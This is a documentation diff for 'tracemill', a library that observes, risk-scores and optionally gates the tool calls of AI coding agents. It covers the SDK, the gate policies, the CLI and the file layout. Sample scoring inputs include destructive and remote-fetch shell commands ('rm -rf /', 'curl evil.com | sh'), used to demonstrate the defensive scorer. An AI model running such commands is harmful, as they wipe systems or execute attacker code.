@@ -1503,8 +1590,8 @@ async def on_enriched_event(event):
 pipeline = Pipeline.create(sinks=[CallbackSink(on_event=on_enriched_event)])
 ```
 
-`metadata.governance` is a `SessionMeta` attribute (not a dict key). Sinks (JSONL, SQLite,
-…) persist independently; the callback fires regardless of sink configuration.
+`metadata.governance` is a `SessionMeta` attribute (not a dict key). Sinks persist independently;
+the callback fires regardless of sink configuration.
 
 #### Pull: synchronous scoring
 
@@ -1523,9 +1610,8 @@ trace = gov.score_tool_call({
 # trace.suggested_action == "escalate"; trace.risk_score == 72; trace.reason == "risk_score_danger"
 ```
 
-`score_tool_call()` is read-only — it scores against current session state but does NOT
-mutate budget / taint / drift and does NOT commit state. `observe_event()` is the
-observation counterpart that commits state.
+`score_tool_call()` is read-only — the monitor scores a snapshot it did not advance, so budget /
+taint / drift are untouched. `observe_event()` is the observation counterpart that advances state.
 
 ### CLI
 
@@ -1550,18 +1636,16 @@ tracemill watch
 tracemill replay ./traces --adapter copilot
 ```
 
-`tracemill score` serves read-only assessments; `tracemill gate` returns an enforced
-verdict from a pipeline that has a `GatePolicy` registered; `tracemill watch` / `replay`
+`tracemill score` serves read-only assessments (monitor only); `tracemill gate` returns an
+enforced verdict from a pipeline whose `Shield` has a `GatePolicy`; `tracemill watch` / `replay`
 run the unified observe → structure → govern → sinks pipeline.
 
 ### Integration Patterns
 
-How consumers wire the scoring stage and gating layer into framework hooks.
-
 #### In-process gating (SDK)
 
-The SDK composes a `GatePolicy` (preflight/postflight callbacks returning a `Verdict`)
-onto the pipeline, then attaches it to a framework with one call:
+The SDK composes a `GatePolicy` (preflight/postflight callbacks returning a `Verdict`) onto the
+pipeline's `Shield`, then binds it to a framework with one call:
 
 ```python
 from tracemill.sdk import Pipeline, GatePolicy, Verdict, ToolCallRequest, GateContext
@@ -1572,21 +1656,21 @@ def preflight(request: ToolCallRequest, ctx: GateContext) -> Verdict:
     return Verdict.allow()
 
 policy = GatePolicy().preflight(preflight)
-pipeline = Pipeline.create(policy=policy)   # facade; gating enabled
+pipeline = Pipeline.create(policy=policy)   # facade; shield enabled
 
-pipeline.gate_crewai()           # CrewAI hooks
+pipeline.gate_crewai()                 # CrewAI hooks
 tool = pipeline.gate_langchain(tool)   # wrap a LangChain tool
-pipeline.gate_maf()              # Microsoft Agent Framework middleware
+pipeline.gate_maf()                    # Microsoft Agent Framework middleware
 ```
 
-tracemill enforces the returned `Verdict` using each framework's native blocking
-mechanism. The optional postflight callback receives the tool output for audit. (The
-`gate_*` helpers also exist directly on `GovernancePipeline` for gating-only use.)
+The `Shield` enforces the returned `Verdict` using each framework's native blocking mechanism.
+The optional postflight callback receives the tool output for audit. (The `gate_*` helpers also
+exist directly on `GovernancePipeline` for gating-only use.)
 
 #### Shell hook (Copilot / Claude Code CLI)
 
-The consumer's hook script pipes the tool-call event to `tracemill gate`, which relays it
-to the running pipeline's IPC server and prints a verdict in the framework's format:
+The consumer's hook script pipes the tool-call event to `tracemill gate`, which relays it to the
+running pipeline's IPC server and prints a verdict in the framework's format:
 
 ```bash
 #!/bin/bash
@@ -1619,46 +1703,46 @@ async def can_use_tool(tool_name, input_data, session_id):
 |-----------|----------|
 | Observation pipeline (always-on) | Which events / sources to observe |
 | Event parsing (framework mappings) | Escalation flow (human-in-the-loop) |
-| Classification + risk scoring | Notification channels (Slack, email) |
+| Classification + risk scoring (`Assessor`) | Notification channels (Slack, email) |
 | Rule evaluation → `RecommendedAction` | Final authority over allow / deny |
-| Session state (taint, drift, budget) | Registering a `GatePolicy` (opt-in) |
+| One session-state authority (taint, drift, budget) | Registering a `GatePolicy` (opt-in) |
 | Storage (sinks) | Audit retention policy |
-| `score_tool_call()` / `observe_event()` | Interpreting the assessment |
-| Opt-in `GatePolicy` → `Verdict` enforcement | Timeout / failure handling |
+| `observe_event()` / `score_tool_call()` | Interpreting the assessment |
+| Opt-in `Shield` → `Verdict` enforcement | Timeout / failure handling |
 
 ### The Single Flow
 
 ```
 1. Agent session starts
 2. tracemill observation pipeline starts (reads from configured source)
-3. Events stream in -> parse -> enrich -> classify -> structure -> govern (stage)
-   • Session state accumulates (taint, drift, budget) — ONLY on observed execution
+3. Events stream in -> parse -> enrich -> classify -> structure -> observe (monitor stage)
+   • SessionState advances once per real tool call — the single writer, single counter
    • Each emitted event carries its SessionMeta on metadata.governance; sinks persist
-4. IF a gate is registered AND a pre-execution hook fires:
+4. IF a Shield (GatePolicy) is registered AND a pre-execution hook fires:
    a. Hook relays the pending call (score_tool_call / tracemill gate)
-   b. Pipeline scores it read-only against current session state
+   b. Monitor scores it read-only against current session state
    c. GatePolicy maps the recommendation to a Verdict (allow / deny)
-   d. tracemill enforces via the framework's native mechanism
+   d. Shield enforces via the framework's native mechanism, records the outcome in SessionState
 5. Observation continues:
-   • Allowed events: appear in source -> state mutates -> persist
-   • Denied events: never in source -> no state mutation (budget stays accurate)
+   • Allowed events: appear in source -> monitor advances state -> persist
+   • Denied events: never in source, never committed -> no state mutation (budget stays accurate)
 ```
 
 ### Deduplication
 
-`score_tool_call()` is **read-only** — it scores against accumulated state but does NOT
-mutate budget, taint, or drift. State changes only occur when the observation pipeline
-processes an event from its source via `observe_event` (confirming execution):
+`score_tool_call()` is **read-only** — it scores against accumulated state but does NOT advance
+the counter, budget, taint, or drift. State changes only when the monitor observes an event from
+its source via `observe_event` (confirming execution):
 
-- **Allowed events:** observation sees them naturally, scores them, commits state, persists.
-- **Denied events:** never appear in the source, so they never mutate state.
+- **Allowed events:** observation sees them naturally, scores them, advances state, persists.
+- **Denied events:** never appear in the source, so they never advance state.
 
-Blocked calls therefore never corrupt budget/taint state. The observation pipeline is the
-single source of truth for state mutations.
+Blocked calls therefore never corrupt budget / taint state. The monitor is the single source of
+truth for state mutations.
 
 ### Configuration (`tracemill.yaml`)
 
-The `governance` section configures the scoring stage. Same shape in YAML and SDK:
+The `governance` section configures the monitor + assessor. Same shape in YAML and SDK:
 
 ```yaml
 # tracemill.yaml
@@ -1706,22 +1790,21 @@ enforcement decisions.
 
 ### Design Constraints
 
-1. **Governance is one stage, not the whole pipeline** — it consumes enriched events and
-   scores them; observation, enrichment, and structuring are separate stages.
-2. **Observation-first by default** — with no `GatePolicy`, tracemill only recommends; the
-   consumer decides.
-3. **Enforcement is opt-in** — a registered `GatePolicy` yields a `Verdict`, enforced via
-   the framework's native mechanism. Final authority stays with the consumer.
-4. **Scoring is opt-in but uniform** — when the governance stage is enabled, every emitted
-   event gets a `SessionMeta`; when disabled, the backbone still observes and structures.
-5. **`score_tool_call()` is read-only** — it never mutates budget/taint/drift; only
-   `observe_event` (the stage) commits state.
-6. **Shared session state** — preflight scoring and observation share the same state
-   snapshot; observation alone commits mutations.
-7. **No framework dependencies in the core** — governance never imports Copilot, Claude,
+1. **One state authority** — `SessionState` owns a single tool-call counter and is mutated only
+   through its own methods; there is no second counter and no external field access.
+2. **Single writer** — only the `SessionMonitor` advances `SessionState`; the `Assessor` is
+   side-effect-free, so a read-only score is an assessment of an un-advanced snapshot.
+3. **Monitor observes, shield enforces** — observation recommends; enforcement is opt-in via a
+   registered `GatePolicy`. Final authority stays with the consumer.
+4. **Program to interfaces (DIP/OCP)** — `Assessor` and `GatePolicy` are injected strategies
+   constructed at the `GovernancePipeline` composition root; collaborators depend on abstractions.
+5. **Determinism** — non-deterministic enrichment is captured onto the event and never
+   re-derived during state mutation, so replay reproduces the live assessment.
+6. **No framework dependencies in the core** — the monitor / shield never import Copilot, Claude,
    LangGraph, etc.; the `gate_*` adapters wrap frameworks at the edge.
-8. **Rules are data** — `recommendation_rules.yaml`. Turing-incomplete.
-9. **Callbacks and gates are optional** — sinks persist regardless.
+7. **Rules are data** — `recommendation_rules.yaml`. Turing-incomplete.
+8. **Fail-closed enforcement** — any error inside the shield's chains yields DENY (preflight) or
+   SUPPRESS (postflight); sinks and callbacks remain optional.
 
 ### Framework Compatibility
 
@@ -1744,8 +1827,8 @@ enforcement decisions.
 | 15 | **smolagents** | Class wrap | `pipeline.gate_smolagents()` | ✓ |
 | 16 | **SWE-agent** | None | — | ✗ (observation only) |
 
-Rows 14 and 16 have no pre-execution hook. tracemill observes and scores their events, but
-no consumer can block their tool calls.
+Rows 14 and 16 have no pre-execution hook. tracemill observes and scores their events, but no
+consumer can block their tool calls.
 
 ### File Structure
 
@@ -1754,15 +1837,23 @@ src/tracemill/
 ├── pipeline.py              # EventPipeline — observation backbone + governance stage
 ├── enricher.py              # Classification + risk enrichment
 ├── trace.py                 # EventTrace, TraceStage (unified record)
-├── governance/              # The scoring stage + gating engine
-│   ├── pipeline.py          # GovernancePipeline (score_tool_call, observe_event, gate_*)
+├── governance/              # The monitor + shield engine
+│   ├── pipeline.py          # GovernancePipeline — composition root / facade (delegates)
+│   ├── monitor.py           # SessionMonitor — single writer (observe / preflight / lifecycle)
+│   ├── registry.py          # SessionRegistry — residency + LRU eviction + reservations
+│   ├── assessor.py          # Assessor — (snapshot, event) -> SessionMeta (label+risk+drift)
+│   ├── shield.py            # Shield — gate context + preflight/postflight + record allow/deny
+│   ├── state.py             # SessionState — one counter, mutated only via methods
+│   ├── persistence.py       # SystemStore — durability (reservations, atomic commit)
 │   ├── results.py           # RecommendedAction, RiskRecommendation, SessionMeta
-│   ├── rules.py             # Rule, Predicate, evaluate_rules()
 │   ├── labeler.py           # GovernanceLabeler
-│   ├── state.py             # SessionState (taint, budget, drift)
-│   └── ...                  # pii, ifc, integrity, drift, budget, observer, persistence
-├── sdk/                     # Pipeline facade + GatePolicy + Verdict + gates
-│   └── pipeline.py          # Pipeline — backbone + governance stage + gating delegates
+│   ├── rules.py             # Rule, Predicate, evaluate_rules()
+│   └── ...                  # pii, ifc, integrity, drift, budget, observer
+├── sdk/                     # Pipeline facade + GatePolicy + Verdict + gate_* helpers
+│   ├── pipeline.py          # Pipeline — backbone + governance stage + gating delegates
+│   ├── gate_policy.py       # GatePolicy (Policy strategy)
+│   ├── gate_types.py        # GateContext, ToolCallRequest/Result, PostflightVerdict
+│   └── verdict.py           # Verdict
 ├── gate/                    # Cross-process gate IPC (tracemill gate)
 ├── gates/                   # Bundled detectors (PII)
 ├── classify/                # Classification engine + data/recommendation_rules.yaml

--- a/SPEC.md
+++ b/SPEC.md
@@ -974,9 +974,12 @@ tracemill/
 │       └── weekly-compat-audit.yml
 ├── src/tracemill/
 │   ├── __init__.py              # Public API surface
+│   ├── __main__.py              # `python -m tracemill`
+│   ├── _generated.py            # Generated EventKind constants
 │   ├── models.py                # StrictModel, FrozenModel bases
-│   ├── types.py                 # EventKind, SessionEvent, EventMetadata, etc.
-│   ├── pipeline.py              # EventPipeline fan-out
+│   ├── types.py                 # EventKind, SessionEvent, EventMetadata, TitleUpdate, etc.
+│   ├── trace.py                 # EventTrace, TraceStage (unified classification + assessment)
+│   ├── pipeline.py              # EventPipeline (fan-out + live phase/boundary/title structuring)
 │   ├── enricher.py              # Stateful enrichment (pairing, classification, risk)
 │   ├── adapters/
 │   │   ├── __init__.py
@@ -995,18 +998,33 @@ tracemill/
 │   ├── sinks/
 │   │   ├── __init__.py
 │   │   ├── base.py              # StorageSink ABC
-│   │   └── callback.py          # CallbackSink
+│   │   ├── callback.py          # CallbackSink (async callables)
+│   │   ├── console.py           # ConsoleSink (pretty terminal output)
+│   │   ├── jsonl.py             # JsonlSink (append-only, rotation)
+│   │   ├── sqlite_output.py     # SqliteSink (local SQLite)
+│   │   ├── s3.py                # S3Sink (object storage)
+│   │   ├── parquet.py           # ParquetSink (columnar analytics)
+│   │   ├── otel_exporter.py     # OtelExporterSink (OTLP spans)
+│   │   └── webhook.py           # WebhookSink (POST to URL)
 │   ├── parsers/
 │   │   ├── __init__.py
 │   │   ├── base.py              # MarkdownPreParser ABC
 │   │   ├── copilot.py           # CopilotPreParser
 │   │   └── aider.py             # AiderPreParser
-│   ├── preprocessors/
+│   ├── preprocessors/           # 14 preprocessors
 │   │   ├── __init__.py          # Registry + all imports
 │   │   ├── registry.py          # register/get_preprocessor
+│   │   ├── amazonq.py
+│   │   ├── antigravity.py
 │   │   ├── claude.py
 │   │   ├── cline.py
+│   │   ├── codex.py
+│   │   ├── continue_dev.py
+│   │   ├── copilot_vscode.py
 │   │   ├── goose.py
+│   │   ├── maf_transcript.py
+│   │   ├── openai_agents.py
+│   │   ├── opencode.py
 │   │   ├── openhands.py
 │   │   ├── pydantic_ai.py
 │   │   └── smolagents.py
@@ -1041,28 +1059,118 @@ tracemill/
 │   │   ├── loader.py            # Hierarchical config loading
 │   │   ├── defaults.py          # Default config template
 │   │   └── mappings.py          # Mapping file resolver
-│   ├── mappings/                # Bundled YAML mappings (16 files)
+│   ├── mappings/                # Bundled YAML mappings (22 files)
 │   │   ├── __init__.py
 │   │   ├── aider.yaml
 │   │   ├── aider_markdown.yaml
+│   │   ├── amazonq.yaml
+│   │   ├── antigravity.yaml
 │   │   ├── claude.yaml
 │   │   ├── cline.yaml
+│   │   ├── codex.yaml
+│   │   ├── continue_dev.yaml
 │   │   ├── copilot.yaml
 │   │   ├── copilot_markdown.yaml
+│   │   ├── copilot_vscode.yaml
 │   │   ├── crewai.yaml
 │   │   ├── goose.yaml
 │   │   ├── langgraph.yaml
 │   │   ├── maf.yaml
 │   │   ├── maf_transcript.yaml
+│   │   ├── openai_agents.yaml
 │   │   ├── opencode.yaml
 │   │   ├── openhands.yaml
 │   │   ├── pydantic_ai.yaml
 │   │   ├── smolagents.yaml
 │   │   └── sweagent.yaml
 │   ├── telemetry/
-│   │   └── __init__.py          # 🚧 Stub
-│   └── formatting/
-│       └── __init__.py          # 🚧 Stub
+│   │   └── __init__.py          # 🚧 Stub (self-metrics, #48). OTLP export ships via sinks/otel_exporter.py
+│   ├── formatting/
+│   │   ├── __init__.py
+│   │   ├── budget.py            # Budget / quota formatting
+│   │   └── density.py           # Event-density summarization
+│   ├── phase/                   # Live ML phase inference (default-on)
+│   │   ├── __init__.py
+│   │   ├── inferencer.py        # PhaseInferencer (stamps metadata.phase)
+│   │   ├── inference.py
+│   │   ├── features.py
+│   │   ├── event_rows.py
+│   │   ├── segmentation.py
+│   │   └── data/                # Packaged ONNX phase model
+│   ├── boundary/                # Live ML activity/step segmentation (default-on)
+│   │   ├── __init__.py
+│   │   ├── inferencer.py        # BoundaryInferencer (stamps metadata.boundary)
+│   │   ├── inference.py
+│   │   ├── features.py
+│   │   ├── decode.py
+│   │   └── data/                # Packaged ONNX boundary model
+│   ├── title/                   # Segment + session titling (segment titling opt-in)
+│   │   ├── __init__.py
+│   │   ├── inferencer.py        # TitleInferencer (emits async TitleUpdate)
+│   │   ├── inference.py
+│   │   ├── context.py
+│   │   ├── heuristics.py        # Zero-dep extractive session-title cascade
+│   │   ├── hygiene.py
+│   │   ├── naming.py            # HeuristicProvider / ApiProvider / build_session_titler
+│   │   ├── _resolve.py
+│   │   └── data/                # Packaged ONNX titler model
+│   ├── tracking/                # Deterministic phase segmenter (research signal, not live path)
+│   │   ├── __init__.py
+│   │   ├── models.py
+│   │   └── phase_tracker.py     # PhaseTracker
+│   ├── governance/              # Governance / assessment engine (18 modules)
+│   │   ├── __init__.py          # Public API re-exports
+│   │   ├── pipeline.py          # GovernancePipeline (score_tool_call -> EventTrace, process_event -> SessionMeta)
+│   │   ├── results.py           # RecommendedAction, RiskRecommendation, SessionMeta, Evidence
+│   │   ├── types.py             # EnrichmentContext, ToolCallEvent, ToolResultEvent
+│   │   ├── state.py             # SessionState, budget / taint snapshots
+│   │   ├── labeler.py           # GovernanceLabeler (Phase 2 data labeling)
+│   │   ├── rules.py             # Data-driven rule engine
+│   │   ├── risk_wrapper.py      # Governance risk modifiers
+│   │   ├── pii.py               # PIIScanner
+│   │   ├── ifc.py               # IFCChecker (information-flow control)
+│   │   ├── integrity.py         # IntegrityVerifier
+│   │   ├── drift.py             # Phase DriftDetector
+│   │   ├── mcp_drift.py         # MCPIntegrityScanner
+│   │   ├── budget.py            # BudgetTracker
+│   │   ├── canonical.py         # Canonical event hashing
+│   │   ├── envelope.py          # EnrichedEvent, ContextGapEvent
+│   │   ├── observer.py          # TracemillObserver adapter
+│   │   └── persistence.py       # SystemStore (SQLite persistence)
+│   ├── sdk/                     # Pipeline + gating SDK
+│   │   ├── __init__.py          # Pipeline, EventTrace, Verdict, GatePolicy re-exports
+│   │   ├── gate_policy.py       # GatePolicy, preflight / postflight gates
+│   │   ├── gate_types.py        # GateContext, ToolCallRequest / Result
+│   │   └── verdict.py           # Verdict, Decision
+│   ├── gate/                    # Cross-process gate IPC
+│   │   ├── __init__.py
+│   │   ├── client.py
+│   │   ├── server.py
+│   │   └── registry.py
+│   ├── gates/                   # Bundled gate detectors
+│   │   ├── __init__.py
+│   │   ├── pii.py
+│   │   └── pii_patterns.yaml
+│   ├── migrations/              # Alembic SQLite migrations
+│   │   ├── __init__.py
+│   │   ├── env.py
+│   │   ├── runner.py
+│   │   ├── models.py
+│   │   ├── script.py.mako
+│   │   └── versions/
+│   └── cli/                     # Click CLI (entry point tracemill.cli:main)
+│       ├── __init__.py          # Command group: "governance pipeline for AI coding agents"
+│       ├── watch.py             # tracemill watch          (config-driven live pipeline)
+│       ├── replay.py            # tracemill replay         (one-shot file reprocess)
+│       ├── score.py             # tracemill score          (preflight scoring HTTP server)
+│       ├── gate_cmd.py          # tracemill gate           (apply a gate policy)
+│       ├── detect.py            # tracemill detect         (framework auto-detection)
+│       ├── config_cmd.py        # tracemill config         (inspect / emit config)
+│       ├── status.py            # tracemill status         (environment / model status)
+│       ├── init_cmd.py          # tracemill init           (scaffold ~/.tracemill)
+│       ├── download_cmd.py      # tracemill download-model
+│       ├── runner.py            # Shared pipeline runner
+│       └── factory.py           # Source / adapter / sink construction from config
 ├── tests/
 │   ├── __init__.py
 │   ├── conftest.py
@@ -1187,10 +1295,11 @@ tracemill/
 | Classification engine | ✅ Complete | Multi-dimensional taxonomy, shell AST (bash/PS/cmd), MCP profiles, tool lookup |
 | Risk scoring | ✅ Complete | Structural + flags + injection + taint + context. MITRE mappings. |
 | EventPipeline | ✅ Complete | Fan-out, error isolation, enricher integration |
-| Storage sinks | ✅ Complete | Callback, Console, Webhook, Jsonl, Sqlite, S3, OtelExporter |
-| CLI runner | ✅ Complete | `cli/` (11 modules) — config-driven pipeline + assess |
+| Storage sinks (8) | ✅ Complete | Callback, Console, Jsonl, Sqlite, S3, Parquet, OtelExporter, Webhook |
+| CLI | ✅ Complete | `cli/` (Click): watch, replay, score, gate, detect, config, status, init, download-model |
 | Gate module | ✅ Complete | Sync scoring path + PII gate + registry (`gate/`, `gates/`) |
-| Governance engine | 🚧 In progress | 18-module `governance/` (Phase 1/2/3, rules, labeler, IFC, drift, budget). See §22 + epic #7 |
+| Live structuring (phase / boundary / title) | ✅ Complete | Packaged CPU-only ONNX models: PhaseInferencer + BoundaryInferencer default-on, TitleInferencer opt-in (emits `TitleUpdate`) |
+| Governance / assessment engine | ✅ Complete | 18-module `governance/`: labeler, rules, PII, IFC, integrity, drift, budget, canonical hash, observer, persistence. Epic #7 (#9–#27) delivered. See §22 |
 | Configuration system | ✅ Complete | Hierarchical loading, env overrides, discriminated unions, bootstrap |
 | Classify data files (9 YAMLs) | ✅ Complete | Binary info, rules, profiles, risk config |
 | CI/CD | ✅ Complete | Lint, test matrix, publish, weekly audits |
@@ -1200,57 +1309,168 @@ tracemill/
 
 | Item | Priority | Dependencies | Notes |
 |------|----------|--------------|-------|
-| **EventBus sugar** | Low | None | Pub/sub is already delivered via `CallbackSink` + `EventPipeline` fan-out (§15). Remaining is optional only: a `subscribe()` convenience + sync-callback adapter. Tracked by #47. |
 | **Telemetry self-metrics** | Medium | None | OTLP span export is done (`OtelExporterSink`, §14). Remaining is opt-in pipeline self-metrics (events/sec, enrichment latency, sink write time), near-zero footprint, no `opentelemetry-sdk` dep. Tracked by #48. |
-| **Phase/boundary tracking subsystem** | Medium | Enricher | Dedicated `phase/` + `boundary/` + `tracking/` ML subsystem (on PR #35, not yet merged). |
-| **Governance epic remainder** | High | Governance engine | Issues #9–#27: writer queue, backpressure queue, sink emission, observer adapter, test coverage. |
+| **PyPI release** | Medium | None | Publish `tracemill` + `tracemill-title-model` to PyPI. Packaging and CI publish workflow are already in place. |
+| **EventBus sugar** | Low | None | Pub/sub is already delivered via `CallbackSink` + `EventPipeline` fan-out (§15). Remaining is optional only: a `subscribe()` convenience + sync-callback adapter. Tracked by #47. |
+
+> **Delivered since this table was first written:** the live structuring subsystem
+> (`phase/` + `boundary/` + `title/`, formerly PR #35) and the full governance epic
+> (#7, stories #9–#27) are both merged and shipping. Issues #9–#27 remain open only as
+> tracker hygiene and should be closed.
 
 ### Implementation Order (Recommended)
 
 `
-1. Governance epic remainder (#9–#27) → completes the assessment engine vision
-2. Phase/boundary tracking merge (PR #35) → live phase classification + titling
-3. Telemetry self-metrics (#48)        → opt-in observability of tracemill itself
-4. EventBus sugar (#47)                → optional subscribe() convenience
+1. Telemetry self-metrics (#48)   → opt-in observability of tracemill itself
+2. PyPI release                   → publish tracemill + tracemill-title-model
+3. EventBus sugar (#47)           → optional subscribe() convenience
+4. Close governance epic issues (#9–#27) → tracker hygiene; work already delivered
 `
 
 ---
 
-## §22 — Assessment API & Integration Patterns
+## §22 — SDK, Governance Stage & Gating
 
-*Event in → assessment out. Enforcement is the consumer's responsibility.*
+*Observe → structure backbone. Governance is one opt-in stage. Gating is an opt-in layer.*
 
 ### Scope
 
-tracemill is a **scoring library**. It observes agent tool calls, classifies them, evaluates governance rules, and produces a `GovernanceAssessment`. It does not issue verdicts, decide enforcement, or own the allow/deny decision.
+tracemill's pipeline observes, parses, enriches, classifies, risk-scores, and structures
+agent events (§9–§11). **Governance/assessment is one stage of that pipeline** — not a
+separate track, and not the whole pipeline. When enabled, it consumes the same enriched
+events and scores them (data labeling, information-flow control, drift detection, budget
+tracking, rule evaluation), stamping a `SessionMeta` onto `event.metadata.governance`
+before the sinks see it.
 
-The consumer — the application operating the agent — interprets the assessment and enforces accordingly: block, allow, escalate to a human, log and continue. Enforcement logic lives entirely in consumer code.
+By default the stage is **observation-first**: it recommends (`allow` / `warn` /
+`escalate` / `deny` / `transform`) and the consumer decides. For consumers that want
+tracemill to decide, an **opt-in gate layer** (`GatePolicy` → `Verdict`) turns those
+recommendations into enforced verdicts using each framework's native blocking mechanism.
+Nothing is gated unless a `GatePolicy` is registered, so the default posture stays pure
+observation.
 
-### The Interface
+### The SDK facade: `tracemill.sdk.Pipeline`
+
+The SDK's top-level entry point composes tracemill's two halves into one object:
+
+* the **observation backbone** (`tracemill.pipeline.EventPipeline`) — enrich → classify →
+  ML-structure (phase / boundary / title) → sinks, and
+* the **governance engine** (`tracemill.governance.pipeline.GovernancePipeline`) — scoring,
+  budgets / drift, and the gating helpers.
+
+Governance is wired in as **one stage**: when enabled, each pushed event is scored and its
+`SessionMeta` stamped onto `event.metadata.governance` just before the sinks. It is not a
+separate pipeline and not a precondition — structuring runs with or without it.
 
 ```python
-assessment = pipeline.assess(payload)
+from tracemill.sdk import Pipeline
+from tracemill.sinks.jsonl import JsonlSink
+
+# Observe a stream: enrich -> classify -> structure -> govern -> emit
+async with Pipeline.create(sinks=[JsonlSink("events.jsonl")]) as pipeline:
+    async for event in adapter.stream(...):
+        await pipeline.push(event)   # emitted events carry metadata.governance
 ```
 
-tracemill's job ends at returning the assessment:
+Construction:
+
+```python
+Pipeline.create(
+    config=None, *, policy=None, sinks=None,
+    enable_structure=True, enable_title=False, enricher=None, governance=True,
+) -> Pipeline
+Pipeline.from_config(path=None, *, policy=None, sinks=None, ...) -> Pipeline
+```
+
+* `config` — a `GovernanceConfig` for the governance engine (in-memory DB + defaults when
+  omitted). `from_config` loads it from a `tracemill.yaml` instead.
+* `policy` — a `GatePolicy` enabling the gating layer (the `gate_*` helpers). Omit for
+  observation-only usage.
+* `sinks` — observation destinations for pushed events. Omit for gating-only usage.
+* `enable_structure` / `enable_title` — phase + boundary (and optional title) ML
+  structuring. Models load lazily on first push, so gating-only usage pays nothing.
+* `governance` — wire the governance engine in as a stage so pushed events get
+  `metadata.governance` stamped (default `True`). Set `False` for pure observation;
+  `gate_*` / `score_tool_call` still use the engine.
+
+The returned `Pipeline` exposes:
+
+* `await push(event)` / `push_span(span)` / `push_usage(usage)` / `flush()` / `close()`,
+  and `async with` (closes on exit).
+* `score_tool_call(payload) -> EventTrace` — read-only preflight (delegates to the engine).
+* `gate_crewai()`, `gate_langchain(tool)`, `gate_langgraph(tools)`,
+  `gate_semantic_kernel(kernel)`, `gate_maf()`, `gate_smolagents(agent_cls=None)`,
+  `gate_pydantic_ai(agent)`, `gate_openai_agents(agent)` — opt-in gating.
+* `.governance` (the `GovernancePipeline` engine) and `.backbone` (the `EventPipeline`) —
+  escape hatches for advanced use.
+
+### The governance engine: `GovernancePipeline`
+
+The scoring stage + gating engine, usable standalone. The `score` / `gate` CLIs and
+gating-only SDK use go straight to it; the facade delegates to it.
+
+```python
+from tracemill.governance.pipeline import GovernancePipeline
+
+gov = GovernancePipeline.create()   # zero-config; or pass GovernanceConfig / policy=
+
+# Preflight from a raw payload -> unified EventTrace, no state mutation
+trace = gov.score_tool_call({
+    "tool_name": "bash",
+    "tool_input": {"command": "rm -rf /"},
+    "session_id": "sess-abc",
+})
+# trace.stage == "assessed"; trace.risk_score == 66; trace.risk_band == "danger"
+# trace.suggested_action == "escalate"; trace.reason == "risk_score_danger"
+```
+
+Three scoring entry points, distinguished by state semantics:
+
+| Method | Input | Session state | Returns | Use |
+|--------|-------|---------------|---------|-----|
+| `score_tool_call(payload)` | `dict` | read-only | `EventTrace` | preflight from a hook |
+| `score_tool_call_event(event)` | `SessionEvent` | read-only | `SessionMeta` | preflight from an adapted event |
+| `observe_event(event)` | `SessionEvent` | **mutating** | `SessionMeta` | the pipeline stage (budget/taint/drift accrue) |
+
+`observe_event` is the method the `EventPipeline` governance stage calls: it runs the full
+state-mutating observation path and returns the `SessionMeta` stamped onto
+`metadata.governance`. `score_tool_call*` are read-only — they score against current state
+but never mutate budget / taint / drift.
+
+`EventTrace` (`tracemill.trace`) is the unified pipeline record — identity, classification,
+and assessment on one frozen object (abridged):
 
 ```python
 @dataclass(frozen=True, slots=True)
-class AssessmentResult:
-    governance_assessment: GovernanceAssessment  # allow/warn/escalate/deny/transform
-    risk_score: int                              # 0–100
-    reason: str | None                           # matched rule's reason code
-    matched_rule: str | None                     # rule ID that triggered
-    classification: Classification               # full classification output
-    transform: TransformSuggestion | None        # suggested rewrite (if TRANSFORM)
-    meta: SessionMeta                            # full pipeline state (taint, drift, budget)
-    elapsed_ms: float                            # assessment latency
+class EventTrace:
+    id: str
+    kind: EventKind
+    session_id: str
+    # classification (enricher fills)
+    mechanism: Mechanism | None
+    effect: Effect | None
+    scope: tuple[Scope, ...]
+    role: tuple[Role, ...]
+    action: tuple[Action, ...]
+    capability: tuple[Capability, ...]
+    structure: tuple[Structure, ...]
+    # assessment (scorer fills)
+    risk_score: int | None
+    risk_band: RiskBand | None
+    suggested_action: Recommendation | None   # allow/warn/escalate/deny/transform
+    reason: str | None                         # matched rule's reason code
+    stage: TraceStage                          # adapted -> classified -> assessed
 ```
 
-The `GovernanceAssessment` enum:
+`SessionMeta` (`tracemill.governance.results`) is the richer stateful output attached to
+`event.metadata.governance`: `classification`, `risk_assessment`, `recommendation` (a
+`RiskRecommendation` with `.recommended_action`, `.reason_code`, `.transform`),
+`budget_snapshot`, `drift`, `mcp_alerts`, `evidence`.
+
+The recommendation enum (`tracemill.governance.results`):
 
 ```python
-class GovernanceAssessment(StrEnum):
+class RecommendedAction(StrEnum):
     ALLOW = "allow"
     WARN = "warn"
     ESCALATE = "escalate"
@@ -1258,197 +1478,187 @@ class GovernanceAssessment(StrEnum):
     TRANSFORM = "transform"
 ```
 
-These are **recommendations from the rules engine**, not enforcement decisions. The consumer interprets them according to their own policy.
+These are **recommendations from the rules engine**. On their own they enforce nothing; a
+registered `GatePolicy` is what turns a recommendation into an enforced `Verdict`.
 
 ### Interaction Models
 
-#### Push: observation (always-on)
+#### Push: observation (governance as a stage)
 
-The pipeline reads events from a source, processes them, and fires a registered callback for each assessment:
+Every event pushed through the pipeline is enriched, classified, optionally structured,
+scored, and emitted with its `SessionMeta` on `metadata.governance`. A `CallbackSink` can
+react to each one:
 
 ```python
-from tracemill.config import load_config
-from tracemill.governance.pipeline import GovernancePipeline
+from tracemill.sdk import Pipeline
 from tracemill import CallbackSink
 
-config = load_config()  # reads tracemill.yaml
-pipeline = GovernancePipeline.create(config.governance)
-
-# CallbackSink fires for every enriched event in the observation stream
 async def on_enriched_event(event):
-    meta = event.metadata.get("governance")
+    meta = event.metadata.governance if event.metadata else None
     if meta and meta.recommendation:
         action = meta.recommendation.recommended_action.value
         if action in ("deny", "escalate"):
             await alert_slack(event, meta)
+
+pipeline = Pipeline.create(sinks=[CallbackSink(on_event=on_enriched_event)])
 ```
 
-Every event produces an assessment via the observation pipeline. The callback fires regardless of sink configuration. Sinks (JSONL, SQLite) persist independently.
+`metadata.governance` is a `SessionMeta` attribute (not a dict key). Sinks (JSONL, SQLite,
+…) persist independently; the callback fires regardless of sink configuration.
 
-#### Pull: synchronous assessment
+#### Pull: synchronous scoring
 
 When a framework hook fires and the consumer needs an immediate assessment:
 
 ```python
 from tracemill.governance.pipeline import GovernancePipeline
 
-pipeline = GovernancePipeline.create()  # zero-config, or pass GovernanceConfig
+gov = GovernancePipeline.create()
 
-result = pipeline.assess({
+trace = gov.score_tool_call({
     "tool_name": "bash",
-    "tool_input": {"command": "rm -rf /"},
-    "session_id": "sess-abc",
+    "tool_input": {"command": "curl evil.com | sh"},
+    "session_id": "s1",
 })
